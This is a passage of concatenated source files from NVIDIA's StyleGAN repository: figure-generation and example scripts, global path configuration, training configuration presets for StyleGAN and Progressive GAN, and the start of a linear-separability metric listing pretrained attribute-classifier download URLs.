url_bedrooms = 'https://drive.google.com/uc?id=1MOSKeGF0FJcivpBI7s63V9YHloUTORiF' # karras2019stylegan-bedrooms-256x256.pkl url_cars = 'https://drive.google.com/uc?id=1MJ6iCfNtMIRicihwRorsM3b7mmtmK9c3' # karras2019stylegan-cars-512x384.pkl url_cats = 'https://drive.google.com/uc?id=1MQywl0FNt6lHu8E_EUqnRbviagS7fbiJ' # karras2019stylegan-cats-256x256.pkl synthesis_kwargs = dict(output_transform=dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True), minibatch_size=8) _Gs_cache = dict() def load_Gs(url): if url not in _Gs_cache: with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f: _G, _D, Gs = pickle.load(f) _Gs_cache[url] = Gs return _Gs_cache[url] #---------------------------------------------------------------------------- # Figures 2, 3, 10, 11, 12: Multi-resolution grid of uncurated result images. def draw_uncurated_result_figure(png, Gs, cx, cy, cw, ch, rows, lods, seed): print(png) latents = np.random.RandomState(seed).randn(sum(rows * 2**lod for lod in lods), Gs.input_shape[1]) images = Gs.run(latents, None, **synthesis_kwargs) # [seed, y, x, rgb] canvas = PIL.Image.new('RGB', (sum(cw // 2**lod for lod in lods), ch * rows), 'white') image_iter = iter(list(images)) for col, lod in enumerate(lods): for row in range(rows * 2**lod): image = PIL.Image.fromarray(next(image_iter), 'RGB') image = image.crop((cx, cy, cx + cw, cy + ch)) image = image.resize((cw // 2**lod, ch // 2**lod), PIL.Image.ANTIALIAS) canvas.paste(image, (sum(cw // 2**lod for lod in lods[:col]), row * ch // 2**lod)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 3: Style mixing. 
def draw_style_mixing_figure(png, Gs, w, h, src_seeds, dst_seeds, style_ranges): print(png) src_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in src_seeds) dst_latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in dst_seeds) src_dlatents = Gs.components.mapping.run(src_latents, None) # [seed, layer, component] dst_dlatents = Gs.components.mapping.run(dst_latents, None) # [seed, layer, component] src_images = Gs.components.synthesis.run(src_dlatents, randomize_noise=False, **synthesis_kwargs) dst_images = Gs.components.synthesis.run(dst_dlatents, randomize_noise=False, **synthesis_kwargs) canvas = PIL.Image.new('RGB', (w * (len(src_seeds) + 1), h * (len(dst_seeds) + 1)), 'white') for col, src_image in enumerate(list(src_images)): canvas.paste(PIL.Image.fromarray(src_image, 'RGB'), ((col + 1) * w, 0)) for row, dst_image in enumerate(list(dst_images)): canvas.paste(PIL.Image.fromarray(dst_image, 'RGB'), (0, (row + 1) * h)) row_dlatents = np.stack([dst_dlatents[row]] * len(src_seeds)) row_dlatents[:, style_ranges[row]] = src_dlatents[:, style_ranges[row]] row_images = Gs.components.synthesis.run(row_dlatents, randomize_noise=False, **synthesis_kwargs) for col, image in enumerate(list(row_images)): canvas.paste(PIL.Image.fromarray(image, 'RGB'), ((col + 1) * w, (row + 1) * h)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 4: Noise detail. def draw_noise_detail_figure(png, Gs, w, h, num_samples, seeds): print(png) canvas = PIL.Image.new('RGB', (w * 3, h * len(seeds)), 'white') for row, seed in enumerate(seeds): latents = np.stack([np.random.RandomState(seed).randn(Gs.input_shape[1])] * num_samples) images = Gs.run(latents, None, truncation_psi=1, **synthesis_kwargs) canvas.paste(PIL.Image.fromarray(images[0], 'RGB'), (0, row * h)) for i in range(4): crop = PIL.Image.fromarray(images[i + 1], 'RGB') crop = crop.crop((650, 180, 906, 436)) crop = crop.resize((w//2, h//2), PIL.Image.NEAREST) canvas.paste(crop, (w + (i%2) * w//2, row * h + (i//2) * h//2)) diff = np.std(np.mean(images, axis=3), axis=0) * 4 diff = np.clip(diff + 0.5, 0, 255).astype(np.uint8) canvas.paste(PIL.Image.fromarray(diff, 'L'), (w * 2, row * h)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 5: Noise components. def draw_noise_components_figure(png, Gs, w, h, seeds, noise_ranges, flips): print(png) Gsc = Gs.clone() noise_vars = [var for name, var in Gsc.components.synthesis.vars.items() if name.startswith('noise')] noise_pairs = list(zip(noise_vars, tflib.run(noise_vars))) # [(var, val), ...] 
latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in seeds) all_images = [] for noise_range in noise_ranges: tflib.set_vars({var: val * (1 if i in noise_range else 0) for i, (var, val) in enumerate(noise_pairs)}) range_images = Gsc.run(latents, None, truncation_psi=1, randomize_noise=False, **synthesis_kwargs) range_images[flips, :, :] = range_images[flips, :, ::-1] all_images.append(list(range_images)) canvas = PIL.Image.new('RGB', (w * 2, h * 2), 'white') for col, col_images in enumerate(zip(*all_images)): canvas.paste(PIL.Image.fromarray(col_images[0], 'RGB').crop((0, 0, w//2, h)), (col * w, 0)) canvas.paste(PIL.Image.fromarray(col_images[1], 'RGB').crop((w//2, 0, w, h)), (col * w + w//2, 0)) canvas.paste(PIL.Image.fromarray(col_images[2], 'RGB').crop((0, 0, w//2, h)), (col * w, h)) canvas.paste(PIL.Image.fromarray(col_images[3], 'RGB').crop((w//2, 0, w, h)), (col * w + w//2, h)) canvas.save(png) #---------------------------------------------------------------------------- # Figure 8: Truncation trick. def draw_truncation_trick_figure(png, Gs, w, h, seeds, psis): print(png) latents = np.stack(np.random.RandomState(seed).randn(Gs.input_shape[1]) for seed in seeds) dlatents = Gs.components.mapping.run(latents, None) # [seed, layer, component] dlatent_avg = Gs.get_var('dlatent_avg') # [component] canvas = PIL.Image.new('RGB', (w * len(psis), h * len(seeds)), 'white') for row, dlatent in enumerate(list(dlatents)): row_dlatents = (dlatent[np.newaxis] - dlatent_avg) * np.reshape(psis, [-1, 1, 1]) + dlatent_avg row_images = Gs.components.synthesis.run(row_dlatents, randomize_noise=False, **synthesis_kwargs) for col, image in enumerate(list(row_images)): canvas.paste(PIL.Image.fromarray(image, 'RGB'), (col * w, row * h)) canvas.save(png) #---------------------------------------------------------------------------- # Main program. 
def main(): tflib.init_tf() os.makedirs(config.result_dir, exist_ok=True) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure02-uncurated-ffhq.png'), load_Gs(url_ffhq), cx=0, cy=0, cw=1024, ch=1024, rows=3, lods=[0,1,2,2,3,3], seed=5) draw_style_mixing_figure(os.path.join(config.result_dir, 'figure03-style-mixing.png'), load_Gs(url_ffhq), w=1024, h=1024, src_seeds=[639,701,687,615,2268], dst_seeds=[888,829,1898,1733,1614,845], style_ranges=[range(0,4)]*3+[range(4,8)]*2+[range(8,18)]) draw_noise_detail_figure(os.path.join(config.result_dir, 'figure04-noise-detail.png'), load_Gs(url_ffhq), w=1024, h=1024, num_samples=100, seeds=[1157,1012]) draw_noise_components_figure(os.path.join(config.result_dir, 'figure05-noise-components.png'), load_Gs(url_ffhq), w=1024, h=1024, seeds=[1967,1555], noise_ranges=[range(0, 18), range(0, 0), range(8, 18), range(0, 8)], flips=[1]) draw_truncation_trick_figure(os.path.join(config.result_dir, 'figure08-truncation-trick.png'), load_Gs(url_ffhq), w=1024, h=1024, seeds=[91,388], psis=[1, 0.7, 0.5, 0, -0.5, -1]) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure10-uncurated-bedrooms.png'), load_Gs(url_bedrooms), cx=0, cy=0, cw=256, ch=256, rows=5, lods=[0,0,1,1,2,2,2], seed=0) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure11-uncurated-cars.png'), load_Gs(url_cars), cx=0, cy=64, cw=512, ch=384, rows=4, lods=[0,1,2,2,3,3], seed=2) draw_uncurated_result_figure(os.path.join(config.result_dir, 'figure12-uncurated-cats.png'), load_Gs(url_cats), cx=0, cy=0, cw=256, ch=256, rows=5, lods=[0,0,1,1,2,2,2], seed=1) #---------------------------------------------------------------------------- if __name__ == "__main__": main() #---------------------------------------------------------------------------- File: config.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Global configuration.""" #---------------------------------------------------------------------------- # Paths. result_dir = 'results' data_dir = 'datasets' cache_dir = 'cache' run_dir_ignore = ['results', 'datasets', 'cache'] #---------------------------------------------------------------------------- File: pretrained_example.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Minimal script for generating an image using pre-trained StyleGAN generator.""" import os import pickle import numpy as np import PIL.Image import dnnlib import dnnlib.tflib as tflib import config def main(): # Initialize TensorFlow. tflib.init_tf() # Load pre-trained network. url = 'https://drive.google.com/uc?id=1MEGjdvVpUsu1jB4zrXZN7Y4kBBOzizDQ' # karras2019stylegan-ffhq-1024x1024.pkl with dnnlib.util.open_url(url, cache_dir=config.cache_dir) as f: _G, _D, Gs = pickle.load(f) # _G = Instantaneous snapshot of the generator. Mainly useful for resuming a previous training run. # _D = Instantaneous snapshot of the discriminator. Mainly useful for resuming a previous training run. 
# Gs = Long-term average of the generator. Yields higher-quality results than the instantaneous snapshot. # Print network details. Gs.print_layers() # Pick latent vector. rnd = np.random.RandomState(5) latents = rnd.randn(1, Gs.input_shape[1]) # Generate image. fmt = dict(func=tflib.convert_images_to_uint8, nchw_to_nhwc=True) images = Gs.run(latents, None, truncation_psi=0.7, randomize_noise=True, output_transform=fmt) # Save image. os.makedirs(config.result_dir, exist_ok=True) png_filename = os.path.join(config.result_dir, 'example.png') PIL.Image.fromarray(images[0], 'RGB').save(png_filename) if __name__ == "__main__": main() File: train.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. """Main entry point for training StyleGAN and ProGAN networks.""" import copy import dnnlib from dnnlib import EasyDict import config from metrics import metric_base #---------------------------------------------------------------------------- # Official training configs for StyleGAN, targeted mainly for FFHQ. if 1: desc = 'sgan' # Description string included in result subdir name. train = EasyDict(run_func_name='training.training_loop.training_loop') # Options for training loop. G = EasyDict(func_name='training.networks_stylegan.G_style') # Options for generator network. D = EasyDict(func_name='training.networks_stylegan.D_basic') # Options for discriminator network. G_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for generator optimizer. D_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for discriminator optimizer. G_loss = EasyDict(func_name='training.loss.G_logistic_nonsaturating') # Options for generator loss. D_loss = EasyDict(func_name='training.loss.D_logistic_simplegp', r1_gamma=10.0) # Options for discriminator loss. dataset = EasyDict() # Options for load_dataset(). sched = EasyDict() # Options for TrainingSchedule. grid = EasyDict(size='4k', layout='random') # Options for setup_snapshot_image_grid(). metrics = [metric_base.fid50k] # Options for MetricGroup. submit_config = dnnlib.SubmitConfig() # Options for dnnlib.submit_run(). tf_config = {'rnd.np_random_seed': 1000} # Options for tflib.init_tf(). # Dataset. desc += '-ffhq'; dataset = EasyDict(tfrecord_dir='ffhq'); train.mirror_augment = True #desc += '-ffhq512'; dataset = EasyDict(tfrecord_dir='ffhq', resolution=512); train.mirror_augment = True #desc += '-ffhq256'; dataset = EasyDict(tfrecord_dir='ffhq', resolution=256); train.mirror_augment = True #desc += '-celebahq'; dataset = EasyDict(tfrecord_dir='celebahq'); train.mirror_augment = True #desc += '-bedroom'; dataset = EasyDict(tfrecord_dir='lsun-bedroom-full'); train.mirror_augment = False #desc += '-car'; dataset = EasyDict(tfrecord_dir='lsun-car-512x384'); train.mirror_augment = False #desc += '-cat'; dataset = EasyDict(tfrecord_dir='lsun-cat-full'); train.mirror_augment = False # Number of GPUs. 
#desc += '-1gpu'; submit_config.num_gpus = 1; sched.minibatch_base = 4; sched.minibatch_dict = {4: 128, 8: 128, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8, 512: 4} #desc += '-2gpu'; submit_config.num_gpus = 2; sched.minibatch_base = 8; sched.minibatch_dict = {4: 256, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8} #desc += '-4gpu'; submit_config.num_gpus = 4; sched.minibatch_base = 16; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16} desc += '-8gpu'; submit_config.num_gpus = 8; sched.minibatch_base = 32; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32} # Default options. train.total_kimg = 25000 sched.lod_initial_resolution = 8 sched.G_lrate_dict = {128: 0.0015, 256: 0.002, 512: 0.003, 1024: 0.003} sched.D_lrate_dict = EasyDict(sched.G_lrate_dict) # WGAN-GP loss for CelebA-HQ. #desc += '-wgangp'; G_loss = EasyDict(func_name='training.loss.G_wgan'); D_loss = EasyDict(func_name='training.loss.D_wgan_gp'); sched.G_lrate_dict = {k: min(v, 0.002) for k, v in sched.G_lrate_dict.items()}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict) # Table 1. #desc += '-tuned-baseline'; G.use_styles = False; G.use_pixel_norm = True; G.use_instance_norm = False; G.mapping_layers = 0; G.truncation_psi = None; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-add-mapping-and-styles'; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-remove-traditional-input'; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-add-noise-inputs'; G.style_mixing_prob = 0.0 #desc += '-mixing-regularization' # default # Table 2. #desc += '-mix0'; G.style_mixing_prob = 0.0 #desc += '-mix50'; G.style_mixing_prob = 0.5 #desc += '-mix90'; G.style_mixing_prob = 0.9 # default #desc += '-mix100'; G.style_mixing_prob = 1.0 # Table 4. #desc += '-traditional-0'; G.use_styles = False; G.use_pixel_norm = True; G.use_instance_norm = False; G.mapping_layers = 0; G.truncation_psi = None; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-traditional-8'; G.use_styles = False; G.use_pixel_norm = True; G.use_instance_norm = False; G.mapping_layers = 8; G.truncation_psi = None; G.const_input_layer = False; G.style_mixing_prob = 0.0; G.use_noise = False #desc += '-stylebased-0'; G.mapping_layers = 0 #desc += '-stylebased-1'; G.mapping_layers = 1 #desc += '-stylebased-2'; G.mapping_layers = 2 #desc += '-stylebased-8'; G.mapping_layers = 8 # default #---------------------------------------------------------------------------- # Official training configs for Progressive GAN, targeted mainly for CelebA-HQ. if 0: desc = 'pgan' # Description string included in result subdir name. train = EasyDict(run_func_name='training.training_loop.training_loop') # Options for training loop. G = EasyDict(func_name='training.networks_progan.G_paper') # Options for generator network. D = EasyDict(func_name='training.networks_progan.D_paper') # Options for discriminator network. G_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for generator optimizer. D_opt = EasyDict(beta1=0.0, beta2=0.99, epsilon=1e-8) # Options for discriminator optimizer. G_loss = EasyDict(func_name='training.loss.G_wgan') # Options for generator loss. D_loss = EasyDict(func_name='training.loss.D_wgan_gp') # Options for discriminator loss. dataset = EasyDict() # Options for load_dataset(). sched = EasyDict() # Options for TrainingSchedule. grid = EasyDict(size='1080p', layout='random') # Options for setup_snapshot_image_grid(). 
metrics = [metric_base.fid50k] # Options for MetricGroup. submit_config = dnnlib.SubmitConfig() # Options for dnnlib.submit_run(). tf_config = {'rnd.np_random_seed': 1000} # Options for tflib.init_tf(). # Dataset (choose one). desc += '-celebahq'; dataset = EasyDict(tfrecord_dir='celebahq'); train.mirror_augment = True #desc += '-celeba'; dataset = EasyDict(tfrecord_dir='celeba'); train.mirror_augment = True #desc += '-cifar10'; dataset = EasyDict(tfrecord_dir='cifar10') #desc += '-cifar100'; dataset = EasyDict(tfrecord_dir='cifar100') #desc += '-svhn'; dataset = EasyDict(tfrecord_dir='svhn') #desc += '-mnist'; dataset = EasyDict(tfrecord_dir='mnist') #desc += '-mnistrgb'; dataset = EasyDict(tfrecord_dir='mnistrgb') #desc += '-syn1024rgb'; dataset = EasyDict(class_name='training.dataset.SyntheticDataset', resolution=1024, num_channels=3) #desc += '-lsun-airplane'; dataset = EasyDict(tfrecord_dir='lsun-airplane-100k'); train.mirror_augment = True #desc += '-lsun-bedroom'; dataset = EasyDict(tfrecord_dir='lsun-bedroom-100k'); train.mirror_augment = True #desc += '-lsun-bicycle'; dataset = EasyDict(tfrecord_dir='lsun-bicycle-100k'); train.mirror_augment = True #desc += '-lsun-bird'; dataset = EasyDict(tfrecord_dir='lsun-bird-100k'); train.mirror_augment = True #desc += '-lsun-boat'; dataset = EasyDict(tfrecord_dir='lsun-boat-100k'); train.mirror_augment = True #desc += '-lsun-bottle'; dataset = EasyDict(tfrecord_dir='lsun-bottle-100k'); train.mirror_augment = True #desc += '-lsun-bridge'; dataset = EasyDict(tfrecord_dir='lsun-bridge-100k'); train.mirror_augment = True #desc += '-lsun-bus'; dataset = EasyDict(tfrecord_dir='lsun-bus-100k'); train.mirror_augment = True #desc += '-lsun-car'; dataset = EasyDict(tfrecord_dir='lsun-car-100k'); train.mirror_augment = True #desc += '-lsun-cat'; dataset = EasyDict(tfrecord_dir='lsun-cat-100k'); train.mirror_augment = True #desc += '-lsun-chair'; dataset = EasyDict(tfrecord_dir='lsun-chair-100k'); train.mirror_augment = True #desc += '-lsun-churchoutdoor'; dataset = EasyDict(tfrecord_dir='lsun-churchoutdoor-100k'); train.mirror_augment = True #desc += '-lsun-classroom'; dataset = EasyDict(tfrecord_dir='lsun-classroom-100k'); train.mirror_augment = True #desc += '-lsun-conferenceroom'; dataset = EasyDict(tfrecord_dir='lsun-conferenceroom-100k'); train.mirror_augment = True #desc += '-lsun-cow'; dataset = EasyDict(tfrecord_dir='lsun-cow-100k'); train.mirror_augment = True #desc += '-lsun-diningroom'; dataset = EasyDict(tfrecord_dir='lsun-diningroom-100k'); train.mirror_augment = True #desc += '-lsun-diningtable'; dataset = EasyDict(tfrecord_dir='lsun-diningtable-100k'); train.mirror_augment = True #desc += '-lsun-dog'; dataset = EasyDict(tfrecord_dir='lsun-dog-100k'); train.mirror_augment = True #desc += '-lsun-horse'; dataset = EasyDict(tfrecord_dir='lsun-horse-100k'); train.mirror_augment = True #desc += '-lsun-kitchen'; dataset = EasyDict(tfrecord_dir='lsun-kitchen-100k'); train.mirror_augment = True #desc += '-lsun-livingroom'; dataset = EasyDict(tfrecord_dir='lsun-livingroom-100k'); train.mirror_augment = True #desc += '-lsun-motorbike'; dataset = EasyDict(tfrecord_dir='lsun-motorbike-100k'); train.mirror_augment = True #desc += '-lsun-person'; dataset = EasyDict(tfrecord_dir='lsun-person-100k'); train.mirror_augment = True #desc += '-lsun-pottedplant'; dataset = EasyDict(tfrecord_dir='lsun-pottedplant-100k'); train.mirror_augment = True #desc += '-lsun-restaurant'; dataset = EasyDict(tfrecord_dir='lsun-restaurant-100k'); train.mirror_augment = True 
#desc += '-lsun-sheep'; dataset = EasyDict(tfrecord_dir='lsun-sheep-100k'); train.mirror_augment = True #desc += '-lsun-sofa'; dataset = EasyDict(tfrecord_dir='lsun-sofa-100k'); train.mirror_augment = True #desc += '-lsun-tower'; dataset = EasyDict(tfrecord_dir='lsun-tower-100k'); train.mirror_augment = True #desc += '-lsun-train'; dataset = EasyDict(tfrecord_dir='lsun-train-100k'); train.mirror_augment = True #desc += '-lsun-tvmonitor'; dataset = EasyDict(tfrecord_dir='lsun-tvmonitor-100k'); train.mirror_augment = True # Conditioning & snapshot options. #desc += '-cond'; dataset.max_label_size = 'full' # conditioned on full label #desc += '-cond1'; dataset.max_label_size = 1 # conditioned on first component of the label #desc += '-g4k'; grid.size = '4k' #desc += '-grpc'; grid.layout = 'row_per_class' # Config presets (choose one). #desc += '-preset-v1-1gpu'; submit_config.num_gpus = 1; D.mbstd_group_size = 16; sched.minibatch_base = 16; sched.minibatch_dict = {256: 14, 512: 6, 1024: 3}; sched.lod_training_kimg = 800; sched.lod_transition_kimg = 800; train.total_kimg = 19000 desc += '-preset-v2-1gpu'; submit_config.num_gpus = 1; sched.minibatch_base = 4; sched.minibatch_dict = {4: 128, 8: 128, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8, 512: 4}; sched.G_lrate_dict = {1024: 0.0015}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 #desc += '-preset-v2-2gpus'; submit_config.num_gpus = 2; sched.minibatch_base = 8; sched.minibatch_dict = {4: 256, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16, 256: 8}; sched.G_lrate_dict = {512: 0.0015, 1024: 0.002}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 #desc += '-preset-v2-4gpus'; submit_config.num_gpus = 4; sched.minibatch_base = 16; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32, 128: 16}; sched.G_lrate_dict = {256: 0.0015, 512: 0.002, 1024: 0.003}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 #desc += '-preset-v2-8gpus'; submit_config.num_gpus = 8; sched.minibatch_base = 32; sched.minibatch_dict = {4: 512, 8: 256, 16: 128, 32: 64, 64: 32}; sched.G_lrate_dict = {128: 0.0015, 256: 0.002, 512: 0.003, 1024: 0.003}; sched.D_lrate_dict = EasyDict(sched.G_lrate_dict); train.total_kimg = 12000 # Numerical precision (choose one). desc += '-fp32'; sched.max_minibatch_per_gpu = {256: 16, 512: 8, 1024: 4} #desc += '-fp16'; G.dtype = 'float16'; D.dtype = 'float16'; G.pixelnorm_epsilon=1e-4; G_opt.use_loss_scaling = True; D_opt.use_loss_scaling = True; sched.max_minibatch_per_gpu = {512: 16, 1024: 8} # Disable individual features. #desc += '-nogrowing'; sched.lod_initial_resolution = 1024; sched.lod_training_kimg = 0; sched.lod_transition_kimg = 0; train.total_kimg = 10000 #desc += '-nopixelnorm'; G.use_pixelnorm = False #desc += '-nowscale'; G.use_wscale = False; D.use_wscale = False #desc += '-noleakyrelu'; G.use_leakyrelu = False #desc += '-nosmoothing'; train.G_smoothing_kimg = 0.0 #desc += '-norepeat'; train.minibatch_repeats = 1 #desc += '-noreset'; train.reset_opt_for_new_lod = False # Special modes. 
#desc += '-BENCHMARK'; sched.lod_initial_resolution = 4; sched.lod_training_kimg = 3; sched.lod_transition_kimg = 3; train.total_kimg = (8*2+1)*3; sched.tick_kimg_base = 1; sched.tick_kimg_dict = {}; train.image_snapshot_ticks = 1000; train.network_snapshot_ticks = 1000 #desc += '-BENCHMARK0'; sched.lod_initial_resolution = 1024; train.total_kimg = 10; sched.tick_kimg_base = 1; sched.tick_kimg_dict = {}; train.image_snapshot_ticks = 1000; train.network_snapshot_ticks = 1000 #desc += '-VERBOSE'; sched.tick_kimg_base = 1; sched.tick_kimg_dict = {}; train.image_snapshot_ticks = 1; train.network_snapshot_ticks = 100 #desc += '-GRAPH'; train.save_tf_graph = True #desc += '-HIST'; train.save_weight_histograms = True #---------------------------------------------------------------------------- # Main entry point for training. # Calls the function indicated by 'train' using the selected options. def main(): kwargs = EasyDict(train) kwargs.update(G_args=G, D_args=D, G_opt_args=G_opt, D_opt_args=D_opt, G_loss_args=G_loss, D_loss_args=D_loss) kwargs.update(dataset_args=dataset, sched_args=sched, grid_args=grid, metric_arg_list=metrics, tf_config=tf_config) kwargs.submit_config = copy.deepcopy(submit_config) kwargs.submit_config.run_dir_root = dnnlib.submission.submit.get_template_from_path(config.result_dir) kwargs.submit_config.run_dir_ignore += config.run_dir_ignore kwargs.submit_config.run_desc = desc dnnlib.submit_run(**kwargs) #---------------------------------------------------------------------------- if __name__ == "__main__": main() #---------------------------------------------------------------------------- File: metrics/linear_separability.py # Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved. # # This work is licensed under the Creative Commons Attribution-NonCommercial # 4.0 International License. To view a copy of this license, visit # http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to # Creative Commons, PO Box 1866, Mountain View, CA 94042, USA. 
"""Linear Separability (LS).""" from collections import defaultdict import numpy as np import sklearn.svm import tensorflow as tf import dnnlib.tflib as tflib from metrics import metric_base from training import misc #---------------------------------------------------------------------------- classifier_urls = [ 'https://drive.google.com/uc?id=1Q5-AI6TwWhCVM7Muu4tBM7rp5nG_gmCX', # celebahq-classifier-00-male.pkl 'https://drive.google.com/uc?id=1Q5c6HE__ReW2W8qYAXpao68V1ryuisGo', # celebahq-classifier-01-smiling.pkl 'https://drive.google.com/uc?id=1Q7738mgWTljPOJQrZtSMLxzShEhrvVsU', # celebahq-classifier-02-attractive.pkl 'https://drive.google.com/uc?id=1QBv2Mxe7ZLvOv1YBTLq-T4DS3HjmXV0o', # celebahq-classifier-03-wavy-hair.pkl 'https://drive.google.com/uc?id=1QIvKTrkYpUrdA45nf7pspwAqXDwWOLhV', # celebahq-classifier-04-young.pkl 'https://drive.google.com/uc?id=1QJPH5rW7MbIjFUdZT7vRYfyUjNYDl4_L', # celebahq-classifier-05-5-o-clock-shadow.pkl 'https://drive.google.com/uc?id=1QPZXSYf6cptQnApWS_T83sqFMun3rULY', # celebahq-classifier-06-arched-eyebrows.pkl 'https://drive.google.com/uc?id=1QPgoAZRqINXk_PFoQ6NwMmiJfxc5d2Pg', # celebahq-classifier-07-bags-under-eyes.pkl 'https://drive.google.com/uc?id=1QQPQgxgI6wrMWNyxFyTLSgMVZmRr1oO7', # celebahq-classifier-08-bald.pkl 'https://drive.google.com/uc?id=1QcSphAmV62UrCIqhMGgcIlZfoe8hfWaF', # celebahq-classifier-09-bangs.pkl 'https://drive.google.com/uc?id=1QdWTVwljClTFrrrcZnPuPOR4mEuz7jGh', # celebahq-classifier-10-big-lips.pkl 'https://drive.google.com/uc?id=1QgvEWEtr2mS4yj1b_Y3WKe6cLWL3LYmK', # celebahq-classifier-11-big-nose.pkl 'https://drive.google.com/uc?id=1QidfMk9FOKgmUUIziTCeo8t-kTGwcT18', # celebahq-classifier-12-black-hair.pkl 'https://drive.google.com/uc?id=1QthrJt-wY31GPtV8SbnZQZ0_UEdhasHO', # celebahq-classifier-13-blond-hair.pkl 'https://drive.google.com/uc?id=1QvCAkXxdYT4sIwCzYDnCL9Nb5TDYUxGW', # celebahq-classifier-14-blurry.pkl 'https://drive.google.com/uc?id=1QvLWuwSuWI9Ln8cpxSGHIciUsnmaw8L0', # celebahq-classifier-15-brown-hair.pkl 'https://drive.google.com/uc?id=1QxW6THPI2fqDoiFEMaV6pWWHhKI_OoA7', # celebahq-classifier-16-bushy-eyebrows.pkl 'https://drive.google.com/uc?id=1R71xKw8oTW2IHyqmRDChhTBkW9wq4N9v', # celebahq-classifier-17-chubby.pkl 'https://drive.google.com/uc?id=1RDn_fiLfEGbTc7JjazRXuAxJpr-4Pl67', # celebahq-classifier-18-double-chin.pkl 'https://drive.google.com/uc?id=1RGBuwXbaz5052bM4VFvaSJaqNvVM4_cI', # celebahq-classifier-19-eyeglasses.pkl 'https://drive.google.com/uc?id=1RIxOiWxDpUwhB-9HzDkbkLegkd7euRU9', # celebahq-classifier-20-goatee.pkl 'https://drive.google.com/uc?id=1RPaNiEnJODdr-fwXhUFdoSQLFFZC7rC-', # celebahq-classifier-21-gray-hair.pkl 'https://drive.google.com/uc?id=1RQH8lPSwOI2K_9XQCZ2Ktz7xm46o80ep', # celebahq-classifier-22-heavy-makeup.pkl 'https://drive.google.com/uc?id=1RXZM61xCzlwUZKq-X7QhxOg0D2telPow', # celebahq-classifier-23-high-cheekbones.pkl 'https://drive.google.com/uc?id=1RgASVHW8EWMyOCiRb5fsUijFu-HfxONM', # celebahq-classifier-24-mouth-slightly-open.pkl 'https://drive.google.com/uc?id=1RkC8JLqLosWMaRne3DARRgolhbtg_wnr', # celebahq-classifier-25-mustache.pkl 'https://drive.google.com/uc?id=1RqtbtFT2EuwpGTqsTYJDyXdnDsFCPtLO', # celebahq-classifier-26-narrow-eyes.pkl 'https://drive.google.com/uc?id=1Rs7hU-re8bBMeRHR-fKgMbjPh-RIbrsh', # celebahq-classifier-27-no-beard.pkl 'https://drive.google.com/uc?id=1RynDJQWdGOAGffmkPVCrLJqy_fciPF9E', # celebahq-classifier-28-oval-face.pkl 'https://drive.google.com/uc?id=1S0TZ_Hdv5cb06NDaCD8NqVfKy7MuXZsN', # celebahq-classifier-29-pale-skin.pkl 
'https://drive.google.com/uc?id=1S3JPhZH2B4gVZZYCWkxoRP11q09PjCkA', # celebahq-classifier-30-pointy-nose.pkl 'https://drive.google.com/uc?id=1S3pQuUz-Jiywq_euhsfezWfGkfzLZ87W', # celebahq-classifier-31-receding-hairline.pkl 'https://drive.google.com/uc?id=1S6nyIl_SEI3M4l748xEdTV2vymB_-lrY', # celebahq-classifier-32-rosy-cheeks.pkl 'https://drive.google.com/uc?id=1S9P5WCi3GYIBPVYiPTWygrYIUSIKGxbU', # celebahq-classifier-33-sideburns.pkl 'https://drive.google.com/uc?id=1SANviG-pp08n7AFpE9wrARzozPIlbfCH', # celebahq-classifier-34-straight-hair.pkl 'https://drive.google.com/uc?id=1SArgyMl6_z7P7coAuArqUC2zbmckecEY', # celebahq-classifier-35-wearing-earrings.pkl 'https://drive.google.com/uc?id=1SC5JjS5J-J4zXFO9Vk2ZU2DT82TZUza_', # celebahq-classifier-36-wearing-hat.pkl 'https://drive.google.com/uc?id=1SDAQWz03HGiu0MSOKyn7gvrp3wdIGoj-', # celebahq-classifier-37-wearing-lipstick.pkl 